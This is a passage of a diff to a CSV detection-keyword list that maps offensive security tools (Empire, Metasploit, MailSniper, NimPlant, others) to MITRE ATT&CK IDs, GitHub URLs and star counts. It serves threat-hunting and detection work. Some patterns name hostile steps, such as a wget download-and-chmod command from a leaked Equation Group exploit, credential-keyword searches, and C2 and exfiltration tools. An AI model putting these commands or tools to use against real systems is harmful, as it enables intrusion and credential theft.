- T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*UsePrtAdminAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*UsePrtImperonsationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*user Inveigh*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-InveighRelay.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*--user orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","0","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" -"*user_eq_pass_valid_cme_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*user_eq_pass_valid_cme_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*--user_file*--password_file*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"*user_password.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*user_to_secretsdump.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*user|username|login|pass|password|pw|credentials*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*user_password.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*user_to_secretsdump.py*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*user|username|login|pass|password|pw|credentials*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*UserEnum*","offensive_tool_keyword","UserEnum","The three scripts provided here allow one to establish if a user exist on a Windows domain. without providing any authentication. These user enumeration scripts use the DsrGetDcNameEx2.CLDAP ping and NetBIOS MailSlot ping methods respectively to establish if any of the usernames in a provided text file exist on a remote domain controller.","T1210.001 - T1213 - T1071.001","TA0007 - TA0002 - TA0003","N/A","N/A","Information Gathering","https://github.com/sensepost/UserEnum","1","1","N/A","N/A","3","209","45","2018-06-03T19:08:37Z","2018-05-21T16:55:58Z" "*UserHunterImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*username-anarchy *","offensive_tool_keyword","username-anarchy","Tools for generating usernames when penetration testing. Usernames are half the password brute force problem.","T1110 - T1134 - T1078","TA0006","N/A","N/A","Credential Access","https://github.com/urbanadventurer/username-anarchy","1","0","N/A","N/A","6","564","113","2022-01-26T18:34:02Z","2012-11-07T05:35:10Z" -"*UsernameAsPasswordCreds.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*userpass_cme_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*userpass_kerbrute_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*UserPassBruteForce*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*UsernameAsPasswordCreds.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*userpass_cme_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*userpass_kerbrute_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*UserPassBruteForce*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "*users/public/troubleshooting_log.log*","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","7","0","2023-08-10T00:30:20Z","2023-07-01T17:59:20Z" -"*users\\public\\elevationstation.js*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*users\\usethis\\NewFile.txt*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*users\\public\\elevationstation.js*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*users\\usethis\\NewFile.txt*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" "*users\public\example.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*users\public\temp.bin*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","0","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*users_asreproast.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_dcsrp_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_kerberoasting.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" -"*users_list_cme_ldap_nullsess_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*users_list_kerbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*users_list_ridbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_cme_ldap_nullsess_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_kerbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*users_list_ridbrute_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*users_no_req_pass.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*users_no_req_pass_full.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*usestager *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" @@ -18011,50 +18195,52 @@ "*using NixImports*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*using SharpExfiltrate*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*using SharpView.Enums*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" -"*using SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","650","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" -"*Using VirusToal website as external C2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*using SMBeagle*","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","9","7","651","79","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" +"*Using VirusToal website as external C2*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" "*UsoDllLoader*","offensive_tool_keyword","UsoDllLoader","This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ","T1210.001 - T1055 - T1574.001","TA0007 - TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/itm4n/UsoDllLoader","1","1","N/A","N/A","4","368","104","2020-06-06T11:05:12Z","2019-08-01T17:58:16Z" "*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*usr/share/seclists*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*usr/src/rusthound rusthound *","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","AD Enumeration","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","9","7","676","56","2023-08-31T08:35:38Z","2022-10-12T05:54:35Z" -"*util.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*util/dot_net_deserialization/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*util.nimplant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*util/dot_net_deserialization/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*utils/payloads.db*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*Utils\Posh.cs*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*V3n0M-Scanner*","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at your own risk.","T1210.001 - T1190 - T1191 - T1595","TA0007 - TA0002 - TA0008 - TA0010","N/A","N/A","Web Attacks","https://github.com/v3n0m-Scanner/V3n0M-Scanner","1","1","N/A","N/A","10","1341","432","2023-10-03T06:04:39Z","2013-10-21T06:05:17Z" -"*v4d1/Dome*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*V3n0M-Scanner*","offensive_tool_keyword","V3n0M-Scanner","V3n0M is a free and open source scanner. Evolved from baltazars scanner. it has adapted several new features that improve fuctionality and usability. It is mostly experimental software. This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds. Use at 